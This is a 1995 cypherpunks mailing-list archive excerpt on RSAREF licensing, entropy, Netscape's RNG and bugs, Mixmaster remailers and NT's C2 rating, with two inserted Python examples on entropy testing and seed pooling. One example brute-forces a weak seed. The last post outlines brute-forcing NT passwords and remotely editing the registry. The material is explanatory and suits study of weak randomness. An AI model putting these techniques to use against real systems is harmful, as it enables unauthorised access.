routines only for securing the channel, and the RSA routines are limited to
endpoint authentication only.

From what I've heard, SSLREF 3.0 may go beyond those limits, requiring
SSLREF 3.0 developers only to use RSA's BSAFE rather than the less
expensive (or at least, no up-front fee) RSAREF.

What Consensus Development would like to do is extend the RSAREF API such
that RSA's concerns as regards direct access to those routines is taken
care of, and can be called by non-PEM/non-Mail applications such as SSLREF.
We need to extend the API for PGP, so ideally anything new we add to the
API should be as general purpose as possible, yet also deal with RSA's issues.

BTW, to explain RSA's issues regarding the RSAREF API: Consensus is
contractually required to get prior approval before licensing RSAREF for
any program that goes underneath the published API. This allows RSA to make
sure that these routines are not used in patented ways that RSA does not
have rights to. Designing new API and getting them to sign off on the
new API allows us to offer licenses to anyone without getting RSA's prior
approval.

------------------------------------------------------------------------
..Christopher Allen                  Consensus Development Corporation..
..<ChristopherA@consensus.com>                 1563 Solano Avenue #355..
..                                             Berkeley, CA 94707-2116..
..<http://www.consensus.com/>             o510/559-1500  f510/559-1505..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 26 Sep 95 05:59:15 PDT
To: cypherpunks@toad.com
Subject: RE: More on "Entropy"
Message-ID: <ac8cea100102100494bb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:29 PM 9/25/95, David Van Wie wrote:
>David Van Wie wrote:
>
>>>The entropy E is defined by the sum across n states of -P_i log_2(P_i),
>
>Timothy C. May wrote:
>
>>Hah! Another physicist converted to the information-theoretic view of
>>entropy!
>
>Indeed.  I was able to track down the literature, and it is most
>interesting.  I am still a little bit skeptical of the "superset including
>thermodynamic entropy" school of thought, but I haven't finished reading all
>of the materials yet!  Clearly, the IT "version" of entropy is a well
>defined and useful thing....

Well, the more you adapt to the information theory point of view, the more
the Shannon-Kolmogoroff-Chaitin definitions become the natural ones, then
the more the whole "thermodynamic" definition of entropy will seem the odd
one.

One is left with the conclusion that Gibbs-style entropy has _something_
fundamental to do with information theory, and can then consider what those
relationships may be.

But, perforce, one is left with the most basic interpretation of
algorithmic complexity: the complexity of a system is related to the length
of the algorithm describing it. A "random" system is one which has no
shorter algorithmic description than itself.

(The connection of this statement to IQ test questions about describing a
sequence is left as an IQ test question for the reader.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

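Added example, not part of any post in this archive: it applies the entropy sum quoted above (E = sum of -P_i log_2(P_i)) and the distribution check described in the earlier "random" number seeds reply to three constructed byte streams, none of which contains any secret. The function names and the cut-off values are assumptions made for the illustration; zlib is used only as a crude upper bound on description length.

```python
import hashlib
import math
import zlib
from collections import Counter

N = 65536           # bytes drawn from each constructed source
CHI2_LIMIT = 400.0  # loose cut-off: 255 degrees of freedom, mean 255, std dev ~22.6


def shannon_entropy(data: bytes) -> float:
    """E = sum over byte values of -P_i * log2(P_i), in bits per byte."""
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def chi_square(data: bytes) -> float:
    """Pearson statistic against a flat distribution over the 256 byte values."""
    expected = len(data) / 256
    counts = Counter(data)
    return sum((counts.get(v, 0) - expected) ** 2 / expected for v in range(256))


def compression_ratio(data: bytes) -> float:
    """Compressed size over original size: an upper bound on description length."""
    return len(zlib.compress(data, 9)) / len(data)


# --- constructed sources; every one is fully determined by the code below ---
def byte_cycle(n: int = N) -> bytes:
    """0, 1, ..., 255 repeated: a perfectly flat histogram."""
    return bytes(i % 256 for i in range(n))


def nibble_walk(n: int = N) -> bytes:
    """Only 16 distinct values ever appear: a visibly skewed histogram."""
    return bytes((i * 7) % 16 for i in range(n))


def md5_of_counter(n: int = N) -> bytes:
    """MD5(0) || MD5(1) || ...: hashing an input that carries no entropy."""
    out = bytearray()
    i = 0
    while len(out) < n:
        out += hashlib.md5(i.to_bytes(8, "big")).digest()
        i += 1
    return bytes(out[:n])


def assess(data: bytes) -> dict:
    chi2 = chi_square(data)
    ratio = compression_ratio(data)
    return {
        "entropy_bits_per_byte": shannon_entropy(data),
        "chi_square": chi2,
        "compression_ratio": ratio,
        "looks_uniform": chi2 < CHI2_LIMIT,  # the "distribution looks random" check
        "compressible": ratio < 0.9,         # a shorter description was found
    }


def survey() -> dict:
    sources = (("byte_cycle", byte_cycle),
               ("nibble_walk", nibble_walk),
               ("md5_of_counter", md5_of_counter))
    return {name: assess(make()) for name, make in sources}


if __name__ == "__main__":
    for name, r in survey().items():
        print(f"{name:15s} E={r['entropy_bits_per_byte']:.4f} "
              f"chi2={r['chi_square']:.1f} ratio={r['compression_ratio']:.4f} "
              f"uniform={r['looks_uniform']} compressible={r['compressible']}")
```

byte_cycle passes the distribution check with the maximum 8 bits per byte yet compresses to almost nothing; md5_of_counter passes both the distribution check and the compressor, although the few lines that generate it are a complete description far shorter than its output.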





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 26 Sep 95 06:10:22 PDT
To: cypherpunks@toad.com
Subject: Hack Microsoft?
Message-ID: <199509260404.AAA14297@clark.net>
MIME-Version: 1.0
Content-Type: text/plain




   Microsoft recently got C2-security status approved for Windows NT by
the National Computer Security Center, a division of the NSA. They
are supposed to put systems through "laborious testing and review" before
they approve C2. So, if one can find bugs in NT's security, one can
toss a little more egg on the NSA's face and the sham that part of
their activities to *help* to secure American computers. A simple
violation of NT's C2 status would be to demonstrate a flaw in its
memory protection implementation. Personally, I think NT is
*riddled* with bugs waiting to be discovered. Hell, even the
NT "service pack" is included in the C2 status, which I bet
has plenty of holes.

  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
what does that say about their so-called COMSEC ability?

-Ray



 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Tue, 26 Sep 95 05:58:03 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509220814.AA06967@cs.umass.edu>
Message-ID: <199509260411.AAA00090@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


I gather the Wall Street Journal is subscribed to 'punks -- seeing as
how I hear they were discussing the overflow bug today.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 26 Sep 95 05:30:22 PDT
To: goedel@tezcat.com (Dietrich J. Kappe)
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <m0sxTvi-001BjLC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think it's

Heh.  Seems so.

> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.

Damn fine idea, but how do a bunch of (p)anarchists choose a mouthpiece ?
Should we assign someone to be 'our' lawyer ?
 
I'd volunteer to be 'spokespunk', I've certainly been interviewed for TV and
print enough, and know how to handle and present myself to the press, but if
this is considered an 'honor' rather than a 'pain in the ass and potential
legal lightning rod' then I'd like to suggest someone with a longer pedigree
who has been writing more code lately take it on.  Tim ?

> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.

Sure.

-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Tue, 26 Sep 95 05:29:18 PDT
To: perry@piermont.com
Subject: Re: cypherpunks press releases/contact list: YES!! DO IT!!
In-Reply-To: <199509202015.QAA05462@frankenstein.piermont.com>
Message-ID: <m0sxU3V-001BjIC@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


> "Vladimir Z. Nuri" writes:
> > I'm going to argue against TCM and others who are opposed to a 
> > "cypherpunk press release" because this is not an "organized group".
> 
> Look, L. (may I call you L.?) --
> 
> we've gone over this many times. We aren't a group. We're a mailing
> list. We've got a diversity of opinions, and we have no organization
> -- nor do we want one.

True enough, but there are sometimes rough consensuses on technical questions,
and if it were clear enough that these were collective in nature and not to
be ascribed to any particular person, e.g.:

"Consensus on cypherpunks seems to be that 40 bit encryption is not viable
 for commercial applications, and that Netscape seems to have taken less
 than due care to choose an appropriate random seed for its session keys."

-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@obscura.com>
Date: Tue, 26 Sep 95 05:06:50 PDT
To: c2.org.mix-l@jpunix.com
Subject: Mixmaster Remailer FAQ
Message-ID: <199509261140.EAA01736@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain



Frequently Asked Questions about Mixmaster Remailers
[FAQ Version 1.5 Sept 22 1995]

                     by
               Lance Cottrell

This document is a semi-technical discussion of Mixmaster remailers.
I wrote this to answer questions often asked by new users of Mixmaster,
and to explain why you would want to use Mixmaster remailers.
At the end of this FAQ is a list of currently active Mixmaster remailers.


What is the most recent version of Mixmaster?
  I am pleased to announce the release of Mixmaster 2.0.2
  It contains many bug fixes. It also provides random remailer
  chaining.

What is Mixmaster?

Mixmaster is a new class of anonymous remailers. Inspired by the existing
"cypherpunk" remailers and discussions on the Cypherpunk mailing list
<cypherpunks@toad.com>, Mixmaster is the next generation in the evolution
of remailer technology.


What is an anonymous remailer?

   Quoting from Andre Bacard's remailer FAQ:
        An anonymous remailer (also called an "anonymous server")
        is a free computer service that privatizes your e-mail.
        A remailer allows you to send electronic mail to a Usenet
        news group or to a person without the recipient knowing
        your name or your e-mail address.
   For a non-technical introduction to remailers (not including Mixmaster),
   I recommend Andre's FAQ. It is posted regularly to:
        alt.privacy,alt.privacy.anon-server,alt.anonymous
   or you can get it by sending mail to:
        To: abacard@well.com
        Subject: Help1
        Message: [Ignored]


What do I need to use Mixmaster remailers?

   Unlike other remailers, you can't just make your own message and send it
   to the remailer. Mixmaster's security comes in part from using a special
   message format. The disadvantage of this is that you need a special 
   program to make the message for you. Once you have that program 
   (the client) remailing is as easy as running the program, and telling it
   which remailers you want to use.


How do I get the Mixmaster client software?

   There are two sites for distribution. The first is my machine:
   http://obscura.com/~loki/Welcome.html/
   or ftp to obscura.com and read /pub/remail/README.no-export

   The other is by anonymous ftp to jpunix.com

   You will have to follow the instructions there to get Mixmaster.
   Because Mixmaster contains cryptography, it may not be exported 
   from the U.S. and Canada. The reason for the circuitous route to download
   Mixmaster is to show my good faith efforts to keep Mixmaster from being
   exported. I have heard rumors that someone has already broken this law,
   and that Mixmaster is available from Europe. I do not approve of this
   and will not support that site.


How do I get the software to run a Mixmaster remailer?

   The remailer software is available from the same sites as the client.


But I only see one Mixmaster distribution?

   The same program is used for both the client and the remailer. The only
   difference is in the installation. For the client you just compile it
   and you are ready to go. For the remailer, you need to set up mail
   forwarding and cron jobs.


What kinds of computers does Mixmaster run on?

   Unfortunately, not PCs or Macs. But it is being ported to those right now.
   Mixmaster runs under UNIX. The only machine it is known not to work on
   is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3,
   Solaris, and several others. It has been compiled and tested on Netcom. 
   If you use it on a machine or service not on this list, please let me 
   know so I can add it.


How does Mixmaster work, and why should I use it?

   You should use Mixmaster if you want the highest level of anonymity
   available, or if you are tired of building remailer messages yourself.
   A discussion of how Mixmaster provides this level of security is beyond
   the scope of this FAQ, but I put an essay on the subject on my home page
   <http://obscura.com/~loki/remailer-essay.html>


Does Mixmaster use PGP?

   No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own
   keys and key file formats. To add a key to a key ring, simply append 
   the key to your key file using your favorite text editor.


When Was Mixmaster Released?

   Mixmaster was originally released on an experimental basis in late
   1994. There were only ever two remailers running Mixmaster 1.0.
   Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly
   available Mixmaster remailers.

What is the latest version of Mixmaster?

   Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can
   now accept messages containing multiple Mixmaster packets. Mixmaster
   can be told to choose a random set of remailers to chain your message
   through. It will now route multiple packet messages over independent
   chains. Several minor bugs were fixed.

   Version 2.0.1 was released on May 27, 1995. The only changes from 2.0
   are some improvements in the documentation, and the inclusion of a 
   more up to date list of remailers.


What remailers run Mixmaster?

   The most recent list of remailers is available on my homepage, along
   with the remailer list and key file for Mixmaster. You can simply
   replace your old files with the ones from my site to keep up to date.
   These files are in ftp://obscura.com/pub/no-export/
   They are also available by ftp.


   Here is the current list of Mixmaster remailers. Send mail to the
   remailer with the subject remailer-key to retrieve the remailer's
   Mixmaster key.

   mix         mixmaster@obscura.com
   vishnu      mixmaster@vishnu.alias.net
   crown       mixmaster@kether.alias.net
   knight      mixmaster@aldebaran.armory.com
   robomix     robo@c2.org
   hroller     hroller@c2.org
   syrinx      syrinx@c2.org
   replay      remailer@replay.com
   hacktic     remailer@utopia.hacktic.nl
   crynwr      remailer@crynwr.com
   spook       remailer@spook.alias.net
   flame       remailer@flame.alias.net
   gondolin    mixmaster@gondolin.org
   q           q@c2.org
   Armadillo   remailer@armadillo.com
   precipice   mixmaster@mix.precipice.com
   anon        mixmaster@anon.alias.net
   secrets     secret@secret.alias.net



Since this is a new FAQ, I am sure it is far from comprehensive. Watch
this space for changes to the FAQ. It will be evolving rapidly for a
while. Please send any questions you think should be here to:

loki@obscura.com

My outpost on the WWW is <http://obscura.com/~loki/Welcome.html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 26 Sep 95 05:02:10 PDT
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9509252047.AA01994@hplyot.obspm.fr>
Message-ID: <Pine.SUN.3.91.950926055621.9486A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Laurent Demailly wrote:

> 
> It's not an exploit script, but you can find an auto crash "animation"
> for Ray's discovered bug on 
>   http://hplyot.obspm.fr/~dl/netscapesec/c1.html
> (or click from the updated http://hplyot.obspm.fr/~dl/netscapesec/)

Crashes the 16-bit Windows version 1.1N.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hugh@ecotone.toad.com (Hugh Daniel)
Date: Tue, 26 Sep 95 06:10:41 PDT
To: cypherpunks@toad.com
Subject: ADMIN:  Sudden CP Vacation, rest up while you can...
Message-ID: <9509261309.AA04686@ecotone.toad.com>
MIME-Version: 1.0
Content-Type: text/plain


  Toad.com (the cypherpunks host machine provided by John Gilmore) was
down today for about 12 hours due to disk/netnews problems, and not
the NSA or little green men (is there a difference...? :r)

		||ugh Daniel
		Majordomo Potty Trainer
		Owner-Cypherpunks@toad.com
		hugh@toad.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 26 Sep 95 05:03:03 PDT
To: cypherpunks@toad.com
Subject: NYT on Nscp Flaw 3
Message-ID: <199509261017.GAA08915@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The New York Times, September 26, 1995, p. D19.


   Hackers Alert Netscape to Another Flaw

   By Bloomberg Business News


   Mountain View, Calif., Sept. 25 -- The Netscape
   Communications Corporation said today that a third flaw had
   been discovered in its Internet access software by a group
   of computer hackers who call themselves the Cypherpunks.

   The hackers -- computer users and mathematicians who try to
   discover weaknesses in computer software and networks --
   found a design flaw that can shut down Netscape's Navigator
   browser software, which helps people travel on the
   Internet.

   Two American college students last week broke Netscape's
   software security code, a design flaw that could jeopardize
   financial transactions done using Navigator. A month
   earlier, a French hacker broke a different Netscape
   security code.

   "We are learning a lot from these problems," said Michael
   J. Homer, vice president of marketing at Netscape. Shares
   of the company, which sold its first stock to the public
   last month, rose $4.25 today to close at $67 in Nasdaq
   trading.

   The latest flaw found by the hacker group is a programming
   error in Netscape software used to navigate the World Wide
   Web, a part of the Internet made up of photos, sounds and
   drawings.

   [End]












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 26 Sep 95 05:01:08 PDT
To: cypherpunks@toad.com
Subject: Suspicious Action Reports
Message-ID: <Pine.SOL.3.91.950926063218.24647B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
[...]

And as for FinCEN, it has recently become the repository for the new SAR's
(Suspicious action reports) to be filed by all banking entities and replacing
the multiple paperwork forms and sites, as stated in the Federal Register.

One thing I noted was the expansion of surveillance responsibility for
banks and other financial transaction organizations.  And whether new or not,
I experienced horror upon reading that financial institutions are supposed
to file a SAR for any suspicious activity, as perceived by the bank, and
are prohibited from disclosing the fact of the SAR to the subject and required
to make financial transaction records, which must be retained for ten years,
available to law enforcement "upon request" - a description which is lacking
a search warrant.

The regulations in the FR, identical for all institutions, actually discussed
bankers and related organizations as entering into "partnerships" with the
federal gestapo in naming names.

Names, that is, of people and monetary transactions that bank and other
financial facilities find "suspicious" - a subjective assessment based on
whatever criteria happen to be in the minds of employees.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: todd@lgt.com (Todd Glassey)
Date: Tue, 26 Sep 95 07:28:55 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Hack Microsoft?
Message-ID: <v02110101ac8db6a370eb@[204.156.156.4]>
MIME-Version: 1.0
Content-Type: text/plain


Ray scribes:

>   Microsoft recently got C2-security status approved for Windows NT by
>the National Computer Security Center, a division of the NSA. They
>are supposed to put systems through "laborious testing and review" before
>they approve C2.

Not so laborious, the brunt of C1 and C2 testing is accomplished by test
suites that do topical levels only. The issue is that there is a NCSC
engineer watching it happen. Hence if it passes it is "blessed".

As per the orange book itself, C2 is about the lowest level of "Secure"
that you can get. In fact if Microsoft had gone to the trouble of a B1 or
B2 rating this would have been impressive but since most systems analysts
have not been familiarized with the levels of system accounting and access
control/logging that represents the various levels of "Orange Book" Rating
it is somewhat superfluous.

>So, if one can find bugs in NT's security, one can
>toss a little more egg on the NSA's face and the sham that part of
>their activities to *help* to secure american computers. A simple
>violation of NT's C2 status would be to demonstrate a flaw in its
>memory protection implementation.



>Personally, I think NT is
>*riddled* with bugs waiting to be discovered. Hell, even the
>NT "service pack" is included in the C2 status, which I bet
>has plenty of holes.

No Doubt;  NT should be easily hacked in the upcoming months by any number
of mortals let alone the gods themselves. What UNIX has that NT doesn't
(which makes it more vulnerable to attack) is 20 more years of evolution,
More copies, everybody knows it (at least in our group)...

As per NT's orange book C2 Rating... C2 is about the lowest level of Secure
that you can get. In fact I personally am unimpressed, rather it is a box
on an RFQ that gets checked. Very few people run C anything sites in
reality. If Microsoft had gone to the trouble of a B1 or B2 rating this
would have been cool but since most systems analysts have not been
familiarized with the levels of system accounting and access
control/logging that represents the various levels of "Orange Book" Rating
it is somewhat superfluous.

This is especially true since the Folks at the FRB and FDIC/FSLIC
organizations are more likely to require B2 or the like on the National
Standards for "blessed" commerce Engines (I wonder what the FSTC has to say
about this?). Seems to me like the "Evil Empire" is just puffing its chest
for a very very small market...

IMHO - Military sites passing real classified data usually are not run on
anything as low as C2. If you want a secure os, look at the Harris Computer
Corp's B1-Certified version of ES/MP UNIX (they call it CX/SX). FOUO - For
Official Use Only sites often run C1/C2 based OS's for Audit training but
are usually not part of the Trusted Computing Base and as such not real
threats. Still the most common problem is human not the OS. Not the actual
OS itself.

>
>  If Cypherpunks can find flaws that the NSA can't, or won't divulge,
>what does that say about their so-called COMSEC ability.


Not necessarily on the NSA, you have to start somewhere and they do a good
job as far as NIST and NCSC efforts are concerned. If you can do better
then you have a good career in commercial cracking or will have lots of
time on your hands (Federal Food is the Pits, and the golf course is gone
from Lompoc!).

>
>-Ray
>
>
>
>

Regards,

T. S. Glassey
Chief Technologist
Looking Glass Technologies
todd@lgt.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Conrad" <drc@russell.moore.com>
Date: Tue, 26 Sep 95 04:57:51 PDT
To: cypherpunks@toad.com
Subject: Re: New Netscape RNG
In-Reply-To: <199509250649.CAA27099@clark.net>
Message-ID: <Pine.LNX.3.91.950926072411.866D-100000@russell.moore.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Ray Cromwell wrote:

>   I just glanced at the new Netscape RNG source. I don't really see
> anything bad, but I haven't analyzed it. However, I'm curious
> as to why variables like the username or the language locality
> are used as sources of entropy. These seem to provide almost nil.

I, too, have only skimmed the code briefly.

[Lots of good stuff deleted]

>   Using those sources probably can't hurt, they just seemed
> like odd choices, "grasping for straws" so to speak.

What isn't clear to me is how much entropy they are assigning to these
sources.  Certainly if they manage to get at least 128 bits of entropy
then it doesn't matter how many non-random bits they mix into the hash.

I think they are simply throwing everything but the kitchen sink in,
and assuming that the overall result will be a sufficient number of
bits of entropy.  But it would be nice to at least see a few comments
on how many bits they expect each individual source to provide.

I also noticed that they use $HOME/.pgp/randseed.bin under unix, but
they don't bother with %PGPPATH%\RANDSEED.BIN on PCs.  I've sent Jeff
a private message about this.

David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 26 Sep 95 06:17:53 PDT
To: cypherpunks@toad.com
Subject: Re: RSA/Cylink arbitration agreement on-line
Message-ID: <v02130503ac8dbea888ef@[157.22.240.13]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 AM 9/25/95, Brian A. LaMacchia wrote:
>[I haven't seen this mentioned yet on the list...]
>
>Cylink has been kind enough to put a copy of the arbitration panel's
>decision on their web page.  Cylink's home page is www.cylink.com.  The
>URL for the actual agreement is:
>
>        http://www.cylink.com/arbtrn_1.html
>
>Spin doctors aside, it doesn't look like either company gained much over
>the other.  I'm not an attorney, but the way I read the agreement RSAREF
>can continue to be used without violating the Stanford patents.  RSA DSI
>cannot *sublicense* the Stanford patents to third parties, but can *sell
>code* that practices the methods claimed in the Stanford patents.  That
>code can then be incorporated into other products, which is exactly what
>PGP 2.6.2 does (it's linked against a copy of the RSAREF library, which
>is covered by the RSAREF license agreement).
>

As far as I can tell, that seems to sum it up. In addition, RSA agrees
in all their contracts to indemnify the licensee regarding RSA's rights to
assign the various technologies. When I called to speak to them, they
reiterated their stance. Since we are going to be handling RSAREF, the
validity of RSAREF licenses was of some importance. Having gone through
the arbitration ruling things seem to be on track.

I'll post more of this to the RSAREF Announce list for folk.

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 26 Sep 95 04:57:33 PDT
To: cypherpunks@toad.com
Subject: The Law of ElectronicCommerce:  EDI, E-mail and Internet
Message-ID: <v02120d01ac8d9186262d@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

Date: Mon, 25 Sep 1995 20:49:03 -0700
From: Davidwfox@eworld.com
To: www-buyinfo@allegra.att.com, e-payment@bellcore.com
Subject: The Law of ElectronicCommerce:  EDI, E-mail and Internet

FYI...

Little Brown and Co. announces release of _The Law of Electronic
Commerce:  EDI, E-mail and Internet_ (Second Edition) by Benjamin
Wright.
This 640 page book has been updated to cover the latest
developments in electronic commerce, including the Utah Digital
Signature Act, electronic cash, computer records, and Internet
commerce.
For more information, contact Little, Brown at tel:
800-331-1664; tel: +1-617-890-0250; fax: +1-617-890-0875.
The summary table of contents is available on the world wide web at
http://infohaus.com/access/by-seller/Benjamin_Wright

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R. Conrad" <drc@russell.moore.com>
Date: Tue, 26 Sep 95 05:42:01 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape "random" number seed generator code available
In-Reply-To: <199509251159.EAA08528@mycroft.rand.org>
Message-ID: <Pine.LNX.3.91.950926083206.866F-100000@russell.moore.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 Sep 1995, Jim Gillogly wrote:

> > jsw@neon.netscape.com (Jeff Weinstein) writes:
> > More on the RNG stuff.  On Unix systems we look for ~/.pgp/randseed.bin,
> > and feed it through the RNG hash.
> 
> Interesting idea, but I have a (perhaps irrational) dislike for this idea.
> If Netscape wants to have its own netsceed.bin file to muck around with on
> my system, I'll authorize it to be set up, but I by god don't want it
> mucking around with my PGP setup.  ...

I thought about this a bit, but I don't think that reading randseed.bin
counts as "mucking around with" the "PGP setup."

PGP launders randseed.bin before saving it for just this reason, so that
reading it won't reveal information on the user's session keys.

And the Netscape folks have published the source code which shows that
they only read the file and hash it with MD5.  That the contents of
randseed.bin have been mixed into an MD5 hash with a bunch of other
things can hardly be called a security hole, in my estimation.

David R. Conrad, conrad@detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee  --  Finger conrad@grfn.org for public key
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.
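
Added example (not part of David Conrad's posts and not Netscape's published source): a Python sketch of the two points in his messages above, that hashing public values such as the username or locale into an MD5 pool costs nothing once at least 128 bits of real entropy are present, and that the code should record how many bits each source is expected to provide. The SeedPool class, the function names, the per-source bit estimates and the sample inputs are all constructed for illustration.

```python
import hashlib
import os
import struct

TARGET_BITS = 128  # MD5 output width, and the "at least 128 bits" bar from the thread


class SeedPool:
    """MD5 mixing pool that keeps a per-source entropy ledger (hypothetical helper)."""

    def __init__(self):
        self._md5 = hashlib.md5()
        self.ledger = []  # (source name, conservative estimate in bits)

    def add(self, name, data, est_bits):
        # Length-prefix label and data so ("ab", b"c") and ("a", b"bc")
        # cannot produce the same pool state.
        label = name.encode()
        self._md5.update(struct.pack(">I", len(label)) + label)
        self._md5.update(struct.pack(">I", len(data)) + data)
        self.ledger.append((name, est_bits))

    def estimated_bits(self):
        # Estimates add up only if the sources are independent, and the
        # result can never exceed the width of the hash.
        return min(TARGET_BITS, sum(bits for _, bits in self.ledger))

    def raw_digest(self):
        # Current pool state regardless of how much entropy was credited.
        return self._md5.copy().digest()

    def seed(self):
        # Refuse to hand out a seed until the ledger reaches the target.
        got = self.estimated_bits()
        if got < TARGET_BITS:
            raise ValueError(f"{got} bits credited, {TARGET_BITS} required")
        return self.raw_digest()


def build_pool(username, locale, pid, strong=None):
    pool = SeedPool()
    pool.add("username", username.encode(), 0)   # known to any observer: no credit
    pool.add("locale", locale.encode(), 0)       # a handful of values: no credit
    pool.add("pid", struct.pack(">H", pid), 15)  # upper bound: 15-bit pid space
    if strong is not None:
        # Assumption: a strong source (OS randomness, or a laundered seed file
        # that is read but never written) credited at 8 bits per byte.
        pool.add("strong", strong, 8 * len(strong))
    return pool


def reproducible_pid(target, username, locale):
    """Audit check: the pid that rebuilds `target` from guessable inputs alone, else None."""
    for pid in range(1 << 15):
        if build_pool(username, locale, pid).raw_digest() == target:
            return pid
    return None


if __name__ == "__main__":
    # Constructed sample inputs.
    weak = build_pool("alice", "en_US", 4242)
    print("weak pool credited bits:", weak.estimated_bits())
    print("rebuilt from pid:", reproducible_pid(weak.raw_digest(), "alice", "en_US"))
    strong = build_pool("alice", "en_US", 4242, strong=os.urandom(16))
    print("strong pool credited bits:", strong.estimated_bits())
    print("rebuilt from pid:", reproducible_pid(strong.seed(), "alice", "en_US"))
```

The ledger is what makes the "kitchen sink" approach reviewable: the zero-credit sources are still mixed in, but they cannot push the pool over the threshold on their own.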





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Markley <mmarkley@microsoft.com>
Date: Tue, 26 Sep 95 09:11:19 PDT
To: cypherpunks@toad.com
Subject: Re: Hack Microsoft?
Message-ID: <9509261711.AA01641@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Bailey <dan@milliways.org> writes:

| 	There also is no way to stop remote users from modifying the
| registry.  *Any* user with an account can remotely dump and modify the
| system registry.  So in theory you can write a bruteforce program to
| keep guessing until it gets a password, then modify the registry to
| make the system do "interesting" things.  The worst part of all this
| is that the Registry is very poorly documented, MSoft must consider
| most of that info "confidential."
